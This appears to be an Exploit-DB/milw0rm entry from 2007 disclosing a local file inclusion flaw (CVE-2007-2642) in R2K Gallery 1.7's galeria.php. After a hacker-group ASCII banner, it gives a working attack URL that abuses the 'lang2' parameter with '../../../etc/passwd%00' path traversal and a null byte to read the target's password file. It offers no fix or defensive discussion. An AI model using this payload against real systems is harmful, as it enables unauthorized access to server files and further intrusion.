R2K Gallery 1.7 galeria.php lang2 Local File Inclusion Vulnerability

2007-05-11T00:00:00
ID EDB-ID:3902
Type exploitdb
Reporter Dj7xpl
Modified 2007-05-11T00:00:00

Description

R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability. CVE-2007-2642. Webapps exploit for php platform

                                        
                                                    \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   R2K Gallery v1.7
[!] Download :   http://usuarios.lycos.es/r2kscripts/
[!] Type     :   Local File Include Vuln

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]

Example :

http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00

---------------------------------------------------------------------

# milw0rm.com [2007-05-11]